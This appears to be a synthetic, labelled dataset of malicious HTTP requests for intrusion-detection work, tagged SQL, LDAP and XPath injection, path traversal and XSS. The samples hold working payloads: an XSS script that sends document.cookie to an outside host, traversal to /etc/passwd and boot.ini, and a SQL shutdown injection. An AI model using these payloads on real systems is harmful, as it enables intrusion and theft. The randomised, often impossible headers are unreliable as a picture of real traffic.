Referer: /rnmu/Sooeuo/tuajbx.jsp
TE: trailers
Trailer: Authorization
User-Agent: 0-FcuK http://www.syeweToy.cz
UA-Disp: 0488,6492,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 494x0584
Via: HTTP/1.4 49.139.180.106, HTTP/9.1 www.ltZsi.gif, 6.4 www.ftnx.js
Transfer-Encoding: gzip
Upgrade: sraa/8.7, apdat/7.5, Eir8/9.0
Warning: 099 188.171.255.136 "sresnpusmMne" "Wed, 01 Apr 09 06:36:17 GMT"
X-Forwarded-For: 84.212.52.145
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 44601
Start - Id: 38611
class: LdapInjection
GET /j-HFsrHgO/dF-9yUEICz/u3aO1vYznFWLw.php3?eXkphp=1283&osoalvlao0o=%29+%28+%7C+++%28seu%3Dhoisl*%29&iEadrhnla=55513144&K48YBAbctp=nNvqw6B&enenanvoelr9Qre=heomtibyS&ZmetaYi5II_WST=ar53 HTTP/1.1
Host: 219.233.53.227
Connection: close
Accept: video/*;q=0.4, audio/x-wav;q=0.9, audio/basic
Accept-Charset: *;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: no-transform
Client-ip: 54.188.209.237
Cookie: 4re5uaMJAek9u=r28..80tVOh;tu=8ur;eitrkbpt=impm1OGa;wpsdlnihvtIf1=ex-jXLoD-P-;hta=wioCpitWuaehsmn
Cookie2: $Version="74"
Date: Mon, 23 Nov 09 14:57:00 UTC
ETag: W/"B3TaHLjmBKNvfeU"
Expect: yEraech
From: RwOaaelp@gdhst.com
If-Modified-Since: Fri, 15 Jan 10 17:30:03 CET
If-Unmodified-Since: Sat, 17 Dec 05 01:07:13 CET
If-Match: *
If-None-Match: "nXgL6Y2iYeKg7yUT"
If-Range: "jS8_NKk2acADu6izVoC"
Max-Forwards: 531
MIME-Version: 0.3
Pragma: 1nt=oc1h
Proxy-Authorization: Digest nc=aD8e32C0
Authorization: e8bit dAimya=iueu5his
Range: -348176
Referer: /zc8ja/na0l/tjio/m07si.doc
TE: chunked;q=0.7
Trailer: Max-Forwards
User-Agent: Mozilla/4.6 (X11; U; Open BSD i386 2.5; xe-nl; rv:3.5.2) Gecko/36131346
UA-CPU: StrongARM
UA-Disp: 7529,000,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5976x789
Via: 6.2 www.etsq.js
Transfer-Encoding: gzip
Upgrade: orntea/9.1, iEl/1.0, nny/7.6
Warning: 557 www.qUo1.jpeg "esote5naNsdrk" 
X-Forwarded-For: 248.9.49.144
X-Serial-Number: 325446948
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38611
Start - Id: 46416
class: PathTransversal
GET /opensS660P/uuduaqaonuzai/i3a/e2tuowt6tqiiAunle9e/0heLrtii/nOf1/Xj/drop4fFY/suhuuasepltgt8gi/tr/eXmwZUuzN/iC.aspx?varopeneservicesqfG@zCOI=13231&ankKFs6=taifdocument%7EpltstDS%5C&ssh3a2th2se=srx4tezoih&nGstdinNsl=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&Taetipimts=usv&cwse=oimg&medlia=2otmklthumeAltdutn&tll8vi=thjt&7ng8dl4Ienhw=9261179&lytfirkostg=suxtrReh1ehcbO&er=%2Frtid+ti&ijHytbaneonrIeh=dsosaaorio6o HTTP/1.0
Host: www.pcypt.fr
Connection: t1fe
Accept: image/png, application/*;q=0.0, text/xml;q=0.2
Accept-Charset: x-mac-roman
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 81.141.227.75
Cookie: n8=kr2m
Cookie2: $Version="1"
Date: Fri, 23 Jan 04 13:44:14 GMT
ETag: "7F80YTH_JJbucQ6@88o"
Expect: tFohG3=hic181ot;uotroo=oietD8
If-Unmodified-Since: Sun, 08 Feb 09 14:50:49 CET
If-Match: "5ZDOH8X.lQ.HddPJ75mD"
If-None-Match: *
Max-Forwards: 544
MIME-Version: 1.3
Pragma: emse5ea=t
Proxy-Authorization: Basic Yko1MG9kOmVpaG5w
Authorization: l2Xanh 5tpe=n7aj
Referer: /tErthit/meyr7der.js
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/3.8 (Windows; U; WinNT 4.4; yr-bc; rv:9.7.6) Gecko/91919077
UA-CPU: x86
Via: 9.5 44.94.164.201, 4.9 www.pesneY.gif
Transfer-Encoding: deflate
Upgrade: hsrO0/6.6, nTafmr/5.2, s8am/7.7, sIshn/6.2
Warning: 543 208.43.170.15 "hd5o7soouee3cviemc" 
X-Forwarded-For: 80.80.233.157
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46416
Start - Id: 46884
class: XSS
POST /6a/h9odatmilqwhmvrmf/nwl7mfdhhvisosunae/is/sehd2Siish/eildttbv1rdmRha2tn/o2VNBFWys/pxti0wcoeeg/szTbsech2x.exe? HTTP/1.0
Content-Length: 393
Content-Language: m6o2ag1,taz,eM4liha
Content-Encoding: gzip
Content-Location: http://www.51bseo0.ch/dtaaoRb/heiec/ni7yD/sNs8/rtia.msf
Content-MD5: bjJ0bG44ZUFtNnd6dGVtbg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 02 Jul 07 10:26:36 CET
Last-Modified: Sat, 01 Dec 07 22:07:40 UTC
Host: 58.174.137.81:80
Connection: close
Accept: audio/x-wav
Accept-Charset: x-mac-turkish, x-mac-hebrew
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-age=12
Client-ip: 152.184.163.84
Cookie: maualhbou5yT=n1cucrTynudDhOx;x%uCjorOu_q=95160665;nrHp=U1bsHawanvIil;SjacceptjTv0dZVSHH=arRshhSoeo;tsuWt1eynUvm=sock_stream;imloeloaHednist=3803
Cookie2: $Version="69"
Date: Sat, 15 Apr 06 21:50:09 CET
ETag: "2lelK@QzT6NAvfG"
Expect: eimHsos=aoe09mew;tEeut=cmfm
From: nbfea3@yM2KA0.biz
If-Modified-Since: Wed, 14 Feb 07 12:17:54 CET
If-Unmodified-Since: Sat, 03 Apr 04 02:59:33 UTC
If-Match: *
If-None-Match: "cB3ebdaEj-Wo8XLHUN"
If-Range: *
Max-Forwards: 3
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Basic Y2VsZ2luZTpmYW5vOUUz
Authorization: Digest qop=auth
Range: -87,-41
Referer: /ErYartj/ofei/Koelm/FePsglet/hhkn6o6n.jpg
TE: trailers,gzip,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/0.5 (compatible; shemtFr; Win98; ufUoa3C; NnmeNsri; nohUi)
UA-CPU: x86
UA-Disp: 457,6373,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 2245x173
Via: 1.2 www.daOrgscw.tiff:2, s4iyo/1.3 249.164.153.118, 0.1 41.12.15.67
Transfer-Encoding: gzip
Upgrade: nteIn/8.4, ihne/7.6, mbtti/6.3, lts/2.7
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 93268691782079750245
----: ----------------
~~~~~: ~~~~~~~~~~~

4s.mhJ4J-Gr6=<style><!--</style ><script  >[document.location.replace   ('http://www.enanie.com/cgi-bin/gese.cgi'+document.cookie);]//--></script  >&IetH6serhed=eczan&et=521&q2IX3JIYr=59152288&ea6hopwi2hsbl=lheh m&fF-PFHn=nMq&Ia=iAn_ZJI024Ze&e8XtehC9C=e&s1acokumed1=864063&CetkI=omzoJgNN.LUh&@jl_a4Mr=\gsd\&stimmeoh=2237&Piw.=8863105

End - Id: 46884
Start - Id: 48104
class: XSS
GET /trtoyt2t2awd/8c1tpwDp6/cthadSrsuweltetnm/oobject.nph-BehzshutdownEr.asmx?lonlruzd0onnl=7623694&oceeleiote=%3Cdiv++style+%3D++++%22+binding%3A++url%28%5Bhttp%3A%2F%2Fwww.raatveic.com%2Fscript%2Ff9odh.php4%5D%29%3B+%22++++%3E&arftaa0yhot=oybnLwUj1KX&r5eoiaeO=demYdrop%3Fhnzs+8ma&Me69@LiGWeval=sGGtaafeeo HTTP/1.0
Host: 123.1.233.230
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-transform
Client-ip: 44.194.102.2
Cookie: UfEy=lr'6cqzumirsUAa
Cookie2: $Version="6"
Date: Sat, 07 Jun 08 07:02:50 GMT
ETag: "QctqqEq0rXpb.PTw"
Expect: 100-continue
From: aIafz@wvamBrQ.uk
If-Modified-Since: Wed, 25 Feb 09 02:10:27 CET
If-Unmodified-Since: Sun, 16 May 04 07:56:14 GMT
If-Match: "tJX6Lsh4xpqwcWn"
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 3.4
Pragma: mooeci8=awue
Proxy-Authorization: Digest realm
Authorization: ny9cr sjeOhe=rf9a
Range: -913822,250-
Referer: http://www.rqshiest.net/aIadnloo.php4
TE: trailers
Trailer: Accept-Charset
User-Agent: eDEV55A http://www.bkoRsr.uk
UA-CPU: StrongARM
UA-Disp: 367,260,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 6001x2247
Via: esOsnl/5.9 www.Eeu3.gif:23775
Transfer-Encoding: deflate
Upgrade: k6wua/1.5, metwv/8.5, seYsb/7.3, xm2ufg/8.4
Warning: 668 168.38.49.39 "rrsFr0irpvtbsQzh0o" 
X-Forwarded-For: 69.186.228.89
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48104
Start - Id: 49781
class: XPathInjection
GET /tkjHU5T7DVq/8zNOff4/2Aq/e9thsdh/linoEsa7ss/ts917q7sPy/nma0/8Oo8/gknNr1Mghsm/dmap64dEshelpedcseht.sh?TspmpoddIm=%28i+++++%3C+++++count%28ghrAid%2Fchild%3A%3Atext%28%29%29+++and+++j+++++%3C+++++count%28thzl%2Fchild%3A%3Acomment%28%29%29+++and++k+++%3C+++++count%28st%2Fchild%3A%3A*%29++++%29&xab=ium%5Dl&sH=nKCmj8&omMGFV=4miewallayeL HTTP/1.0
Host: 148.59.248.194
Connection: yneie
Accept: image/png;q=0.6, audio/basic
Accept-Charset: koi8-r;q=0.9, utf-7;q=0.4, gb2312;q=0.6, iso-8859-9;q=0.5, iso-8859-6;q=0.4
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 227.62.139.89
Cookie: bxmailYmvSlS0=wdrimg7etAc($ity
Cookie2: $Version="3"
Date: Thu, 11 Oct 07 22:39:52 UTC
ETag: "JQl-q5Ler@UUd1wq"
Expect: hekfnM
From: 0o1be@Sjeha.org
If-Modified-Since: Sun, 14 Jan 07 14:05:13 CET
If-Unmodified-Since: Thu, 21 Dec 06 24:26:48 UTC
If-Match: *
If-None-Match: "BGEzR4kHxactQoU"
If-Range: Wed, 04 Apr 07 22:13:39 CET
Max-Forwards: 8
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM dHNjYTdselZvczdlcmFyYW9pemlldTZhM2hrZUlnbjZ0RXBnc0lkbmNybTY=
Range: -43159,7-
Referer: /a5Maa.tar
TE: trailers,trailers
Trailer: Connection
User-Agent: Mozilla/8.4 (X11; U; Solaris 5.3; ws-ph; rv:8.2.7) Gecko/69365781
UA-CPU: Sparc
UA-Disp: 7451,3171,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 3095x7377
Via: HTTP/0.5 29.73.110.139, 2.6 www.dufhR.js, 9.3 219.39.6.218
Transfer-Encoding: gzip
Upgrade: reoahn/2.3, btQ7il/2.0, ehd/9.6
Warning: 313 www.rnatjdd.tiff "ikOaheaoton2wee" "Wed, 13 May 09 04:48:39 UTC"
X-Forwarded-For: 203.64.166.11
X-Serial-Number: 5663252755
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49781
Start - Id: 45873
class: PathTransversal
GET /lZ7_9YCEsYz4qmfhMy/6Ectttrptpiumem/G8VH/hlAtatX4fa73ql.php?tlnio6en7aiQia3=4fozsm&1yge6ia=n%3A%5Cwindows%5Cboot.ini&arfs9etsdjeLdi=2&2tsTMiwa3Aann=ginputrh&AhgiGXqBE=ew68ba%7Cimomt&niesmi=gdw%25%2Bn9e&4fVPd6mH.=094200373&qtvtotsEu6lenoe=tyeke&ielesytmyst0q=5498828458&meue7=5483523773 HTTP/1.1
Host: www.mfPo.de:80
Connection: close
Accept: text/plain;q=0.2
Accept-Charset: windows-1255, big5
Accept-Encoding: *
Accept-Language: acg6-cps63sTt, airste-sgHxmoid, 9Mlt9-ikIeoc;q=0.2, eut-Enlell
Cache-Control: only-if-cached
Client-ip: 251.11.69.130
Cookie: asikot5=8858432;dreveasTtnin5z6=sstoee+rldgpdy-ipea;a8nesm2hWtt=36154640
Cookie2: $Version="18"
Date: Tue, 03 Apr 07 05:03:14 UTC
ETag: "NZR.pyFHpDj5.Hgrtt6w"
Expect: hor0
From: ofnyan@esdcimRn.ch
If-Modified-Since: Sat, 01 Jul 06 13:42:04 GMT
If-Unmodified-Since: Tue, 17 Apr 07 03:27:09 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 17 Jan 10 11:44:27 GMT
Max-Forwards: 3
MIME-Version: 7.2
Pragma: Sj1rhalo='e'
Proxy-Authorization: ha2n eocndmf=oIeb
Authorization: dsteL 9EurCSnS=ceaotr
Range: 81947-,357703-
Referer: /xeafA/pi7snnte.avi
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: soLaeFZ http://www.n6lxgdA.org
UA-CPU: StrongARM
UA-Disp: 239,737,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 0549x672
Via: 5.4 60.220.188.218:8841, FTP/1.4 www.Ohns.jpg, 8.0 174.55.231.78:8447
Transfer-Encoding: identity
Upgrade: nrw/4.6, rEisa/4.6
Warning: 742 165.170.93.206 "swnoxaS" 
X-Forwarded-For: 150.61.102.195
X-Serial-Number: 9205115584869
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45873
Start - Id: 50075
class: XPathInjection
PUT /sBN4u6LNJgNKMLa4/oVSeV1bZ..html? HTTP/1.1
Content-Length: 100
Content-Language: emtRrht,rurixtN
Content-Encoding: gzip
Content-Location: /ktliTnt/gtai.shtml
Content-MD5: aDFpc211aHNsaDRhY3N4Zw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 31 Mar 07 17:35:12 CET
Last-Modified: Wed, 10 Mar 04 02:18:00 GMT
Host: 85.114.14.16
Connection: close
Accept: audio/*
Accept-Charset: iso-8859-4
Accept-Encoding: 
Accept-Language: 0HPgzm-honihee;q=0.5, tlhei-orVgwds;q=0.1
Cache-Control: paiAtenn=s1
Client-ip: 153.53.54.38
Cookie: Lhgmsamc9=ne'    or     1<  2/onct/nehee/child::text()[position()=2]    or     '3a1exs' =';haosnf=ve9r;Oyme2esd=lps;ssSrroEr87olUoe=wgethrO 9h  a;untialsrtjq7=nrZR;dololrsSriois=fcMO_@
Cookie2: $Version="33"
Date: Wed, 04 Oct 06 19:15:55 UTC
ETag: "4qMoo.KfDXMvE2Ng4J9N"
Expect: 100-continue
From: ltnb@jcopsBeoia.be
If-Modified-Since: Thu, 23 Aug 07 24:05:07 UTC
If-Unmodified-Since: Fri, 29 Aug 08 08:51:57 GMT
If-Match: "NLBzPzbZwYYX.xN0"
If-None-Match: "Jib2xbSJmg-sYvEtP1Y"
If-Range: Wed, 11 Aug 04 02:31:58 CET
Max-Forwards: 13
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: Basic eWV0cm50d3I6bjRhdGVh
Authorization: Basic MHJpZXN0OmhvbVRpN0Rz
Range: 261-
Referer: /0bsNo8oi/8sueo/rydim/tOso0mAe/senHa.tar.gz
TE: gzip;q=0.7,trailers,trailers
Trailer: Range
User-Agent: mzYrWN2TU http://www.scdupeh.uk
UA-CPU: MIPS
UA-Disp: 520,799,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 254x290
Via: ihd/4.2 www.wmaRiA.tiff:9783
Transfer-Encoding: identity
Upgrade: snw/3.3, igei/8.1, tfs/7.6
Warning: 870 www.d6Oa.html "otontuJsraw2qrmirbm" 
X-Forwarded-For: 135.66.145.39
X-Serial-Number: 12208
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Tot9tr9loIi=u0o&Tat5ilus=asfemtoaeilc1f8sid&mE=tKLjrgnxr&pyloq=trseae&thdwu=iN&5m3er9dESyuitT=035260

End - Id: 50075
Start - Id: 35227
class: SqlInjection
GET /oag01OO/eRq/76eullOM/o.a4C5x/peadd9FYl4nHVr/aukrUMAA6N/LAt3hoo1sleaxsnwut/odd0nerEakkonena/8aeOmeeEu/iRzphpQics74voK.jpg?1bttn=7915804704&2Xy3mUv-SJnetcatsam=%27%3B+++shutdown--&Cacs7A84BQaX=52O&eW1=07&r1WycybgosJa=%7C HTTP/1.1
Host: 101.219.189.107
Connection: mwse
Accept: */*;q=0.0
Accept-Charset: utf-8, koi8;q=0.9, iso-8859-4
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 77.106.13.151
Cookie: sgv9d6cmnd=swci4syii;dhmooo=9319656;bwstcno=exi
Cookie2: $Version="12"
Date: Tue, 11 Mar 08 15:36:01 CET
ETag: W/"bFb127kl2ale7r@.kL9"
Expect: 100-continue
From: oeeetot@ecjsbsx.org
If-Modified-Since: Wed, 17 Jun 09 19:20:54 CET
If-Unmodified-Since: Mon, 15 Sep 08 20:33:26 CET
If-Match: "i22JZk1gkOPbluxUnaU"
If-None-Match: "eS-wa1AEizm9vthep5u3"
If-Range: "YQ9-Df768EBLQVq"
Max-Forwards: 10
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: alkiR qetet=eoDage
Authorization: Basic MWdNbmVuaWI6aHRpb2U=
Range: -2,109-7
Referer: /thErho/esninq/eTtoifn/dnhhe.swf
TE: chunked,chunked
Trailer: Accept-Language
User-Agent: Mozilla/7.5 (Windows; U; Win98 7.1; Dx-f5; rv:0.9.4) Gecko/35893821
UA-CPU: Sparc
UA-Disp: 1181,695,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 0990x1742
Via: 3.2 www.fEndAno.css, HTTP/9.0 221.44.80.95
Transfer-Encoding: deflate
Upgrade: doyt/0.4, bE3yw/1.4, otunr5/6.9, 62V/0.3, trd9ad/7.6
Warning: 389 www.eetaIMn.js "i6iB7Cled" "Wed, 06 Jan 10 21:20:43 GMT"
X-Forwarded-For: 124.235.20.134
X-Serial-Number: 735496334921593
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35227
Start - Id: 44657
class: PathTransversal
GET /eV@NW@@u1/gNKK1Ef/8mrf/snj1n./3as/n2N7hg49/d9pattstn68she/ahK58biG95SDn4_mRv/Ag2v5Y9qcJbbze5/JA/j9Wpjc561Zw4/oieeclXqbEi.shtml?ea=t%28Nvso47iinsertds&nere98S=mdEygiwT&tndee0nreWbanmh=eigm2ne&a274H=ttNoltF+rooooyrTe1+%7E HTTP/1.0
Host: www.diwe.fr
Connection: close
Accept: image/png;q=0.8, application/postscript;q=0.4, text/html
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 16.130.45.174
Cookie: 6ejvckAysnx8en=/./../../.././../.././../.././../../../;oHq5bn=oQsdDdnttgront
Cookie2: $Version="1"
Date: Mon, 10 Sep 07 10:50:19 GMT
ETag: "U_ZNTM@RFl.A2VUa"
Expect: 100-continue
From: fIfg@eoiOetgSo.fr
If-Modified-Since: Sat, 19 May 07 01:36:25 CET
If-Unmodified-Since: Mon, 15 Nov 04 07:35:25 CET
If-Match: *
If-None-Match: "rq31P3rY4BBAkGD0wJP"
If-Range: Wed, 30 May 07 04:38:40 UTC
Max-Forwards: 4
Pragma: t2tu='abg'
Proxy-Authorization: eaowfh leeewnas=9Iy2e
Authorization: Digest realm
Range: 73929-1,-1308,686-
Referer: /hn9teeeo/vdije.txt
TE: deflate;q=0.3,trailers,trailers
Trailer: Connection
User-Agent: fvFPf4@bc http://www.rmuy0h.gov
UA-CPU: MIPS
UA-Disp: 508,1015,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 8872x5937
Via: HTTP/5.5 www.r0mordr.gif
Transfer-Encoding: compress
Upgrade: ervl/3.1, rWat5n/5.8
Warning: 611 www.mA5n.jpeg "Ebst3d" 
X-Serial-Number: 0781889348466
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44657
Start - Id: 36272
class: PathTransversal
GET /logChtpassHcznWX.33Y_/lOMVSMlSEs9PEkE/d8P8.msf?UvGL=2&y2Ylebkt=esId8&wt=o+blyPWmd1wf&ote2ciemtwrzwM=%2F%2C%2C%2C%2F7ioag%2F7h2rs%2Fpasswd&cafn=bsancFEkJK&dQgWyl=ldstnDngpbcr&z1VU1HRDK=815008 HTTP/1.1
Host: 230.57.43.60:4505
Connection: hbxeThst
Accept: text/xml;q=0.9, image/*;q=0.6, video/mpeg
Accept-Charset: macintosh;q=0.9, x-mac-hebrew, hz-gb-2312;q=0.0
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 117.40.148.200
Cookie: TtleHho8edth=ncUbvxu.GrH;37=itsGe;d4t9iRlijkzt=' s7Ee;TmHgYWpsCO21=95962317
Cookie2: $Version="704"
Date: Wed, 01 Mar 06 09:00:28 CET
Expect: 100-continue
If-Modified-Since: Tue, 09 Mar 10 06:35:55 UTC
If-Unmodified-Since: Thu, 30 Nov 06 21:00:47 CET
If-Match: "SpAoDzyAQqMW2Mu"
If-Range: Wed, 19 Sep 07 04:56:44 UTC
Max-Forwards: 3728
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: MndaWr e9nrTe=deg9
Referer: http://eaEfew.net/nomNda/tsernt/6t5e/tamnr/ea0htl.tiff
TE: trailers,trailers
User-Agent: Mozilla/4.9 (Windows; U; Windows NT 8.8; te-e1; rv:3.4.7) Gecko/33850707
UA-OS: Solaris
UA-Pixels: 6917x927
Via: 2.0 www.pgNcu.jpeg, 1.7 www.Nsoaetq.jpg
Transfer-Encoding: deflate
Upgrade: t6a9mC/0.8, isrjmh/3.6, Wb7h6/0.9
X-Serial-Number: 3858869813582017
----: ----------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 36272
Start - Id: 37110
class: LdapInjection
GET /4U7Q8_7YAlSrGG9YRpmp/yhs/pamEx/E0_winntS_5-brv/e9U3l8.GzF/9eFQ/sZc/f_byqE@D88/ol/0gRTioawctsd.shtml?s6prgbrtetcfl=%29+%28+%7C%28ai%3Dfe*%29&f1brs=h2K&rrpebrg=tZVHHMAVR&tnpnaomwanrh=r2CiRMH&BVwTFMVnp5zh=0no+s%264i+4ebetweenou0dhor+&hgsystemmfInS2Yw=9828712&pqhreulxokux=0573884230&B9zA6ewnull=a&iPppassthrunJY.V=5712&qmsi0h=b0_MEU&decihYtslih=mfernthC6epnd HTTP/1.0
Host: 57.44.32.50
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: x-mac-arabic, euc-jp;q=0.4
Accept-Encoding: *
Accept-Language: en-h, hrer2k-iymcofrh;q=0.2, us1on-ccb, tr-Sc8pbrij
Cache-Control: trdt=toarbaed
Client-ip: 82.149.38.78
Cookie: XJMq.wr=2iHhciltrltt;movlebetweenm=568;kiglhtrti1elch=yenef8siHaex6eikho;sisaizoeerrT='uekmsog Ae 0Em;nGaois0mho4nn1=24465;aimtitAhlteRS=046
Cookie2: $Version="656"
Date: Mon, 05 Jun 06 21:11:39 CET
ETag: W/"xd@6ixSS3TZ3a9Iy"
Expect: 100-continue
From: moaqfoa@te8R.fr
If-Modified-Since: Mon, 26 Jun 06 16:05:08 CET
If-Unmodified-Since: Mon, 07 Jun 04 09:27:04 GMT
If-Match: *
If-None-Match: "ojSgwCgdRWGkrwDAJh"
If-Range: "BT9pYNzXxnNtaUUa"
Max-Forwards: 43
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Basic ZWVKbmI6ZGk1OHI=
Authorization: Digest response="22AF7033a49C83DF9fE5d8bDEc06BEe0"
Range: -9071,2584-
Referer: /rNrsiBrt/0monpx5j/chce5n/Tseogwpr.php3
TE: trailers,trailers,chunked
Trailer: Via
User-Agent: ee43sson
UA-CPU: 68000
UA-Disp: 529,581,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 617x3755
Via: 5.5 40.219.191.192:1590, 9.9 www.mitmm.html, 8.9 www.oe6AE.tiff
Transfer-Encoding: ssaiun; saaanr=elEnru
Upgrade: rPog/6.3, anziha/1.6, Aaolrp/4.1, ige/4.9, mu8/9.9
Warning: 296 92.253.127.230:14 "0shhdnca" "Sun, 22 Feb 04 22:26:45 CET"
X-Forwarded-For: 67.99.234.48
X-Serial-Number: 85332942046227560401
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37110
Start - Id: 37730
class: LdapInjection
GET /y8lN79THGZo./t-xhgroup by@sxbY/w7bvGIq81aM5x77nm/ss2elyyqiq/SlgBtteEhynAlrrbu/aSHbt/i1omleirut5bR/69etabthIskpkitoo/hkrQhN/wpIe93sO4iyi7l9eluek/97_cq6/sbKIozRsozNJm.jpg?adAwrh=weYumailnode5t&ns=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&eri0Sohenyfid=blr&innt=562njAe3di&e2ezgo0lesgimua=eeerhs2tLUtnNIsapf&wsskyataicoe=seoAeff6+c5%29V HTTP/1.1
Host: 224.199.142.234
Connection: hesnm
Accept: */*;q=0.4
Accept-Charset: windows-1255;q=0.7, cp-932;q=0.5, cp-950, x-mac-turkish
Accept-Encoding: 
Accept-Language: lrMgyser-tN, s-ur, eeoan9-ldusey, izpa-cce6nte
Cache-Control: only-if-cached
Client-ip: 81.167.77.230
Cookie: rdszbIep7datgi=hyrayfM$z+eyadi;taoOhwBxnges5xW=78542129;rDlrihhobh=copyt&tNaa;divqiubin6y5m=aDigtum ejee/
Cookie2: $Version="745"
Date: Thu, 27 Dec 07 11:37:13 CET
ETag: W/"qrG_OEUFRXt40hYLA0"
Expect: fniL
From: Iiydrs@AboeNOsxe.biz
If-Modified-Since: Fri, 10 Mar 06 15:12:26 CET
If-Unmodified-Since: Mon, 24 Oct 05 02:00:30 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 22 Apr 06 05:47:16 CET
Max-Forwards: 97
Pragma: no-cache
Authorization: NTLM N1hrbXBhbGEyZ2VhN1R0aW5lOTZub3ZjZWVuaXYwZWlsR2k=
Referer: http://lxyN.ch/zenwerwl/7hoeobao/0ttli.pl
Trailer: From
User-Agent: Mozilla/5.5 (X11; U; Open BSD i586 3.4; e8-ss; rv:3.2.9) Gecko/75454722
UA-CPU: x86
Via: ape/0.9 209.174.31.101
Transfer-Encoding: compress
Upgrade: tic/8.0, oHra/5.7, iee/5.7, onys/7.1
Warning: 812 www.dOsiefc.htm "lm4se" 
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37730
Start - Id: 35825
class: XPathInjection
GET /t_7oq8txB6Kfy/eYYVt_wxbsNP/s2XC2h8/hvJnznFJtCj02_rm/ro/ee7EesdGlt/est7o/nloscEiBTapfeYus.php?zedo=59+++or++++h%2FnLf8ni%2FRar3u%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D079%5D+++or+++++2%3D HTTP/1.0
Host: www.iayet.net:1998
Connection: tDmee
Accept: application/x-tar;q=0.8, application/postscript, text/plain
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 157.72.186.40
Cookie: 6thiu=asozUlh;nzwt=8331;wpiframem9No=694
Cookie2: $Version="2"
Date: Sat, 21 Jul 07 11:09:57 CET
ETag: W/"lpsbtCm1cdq5sF5ek"
Expect: 100-continue
From: a2frd@mttrrPoVI.gov
If-Modified-Since: Mon, 16 Feb 04 23:55:54 CET
If-Unmodified-Since: Mon, 27 Aug 07 21:33:03 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 06 Jan 06 19:42:34 UTC
Max-Forwards: 3162
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: ctrva 6eFteS=Yswi
Authorization: NTLM bGplUmlzMkU5QWhzdGVjc2lkczBmb2Vjb1VqdHFhc1MwZW5wdA==
Range: 77-,-9
Referer: http://7altus.de/tbntah/tynhne/tyorAne/3uyzt3.html
TE: gzip;q=0.8,gzip
Trailer: Via
User-Agent: Mozilla/1.3 (compatible; ethcpw3ojh; Linux i586; iegc)
UA-CPU: x86
UA-Disp: 747,476,16
UA-OS: Linux
UA-Pixels: 4135x5853
Via: FTP/0.1 www.brrsnuo.html
Transfer-Encoding: identity
Upgrade: oyytm/9.6, hhc/4.5, Ojwace/7.1, toww7E/9.4
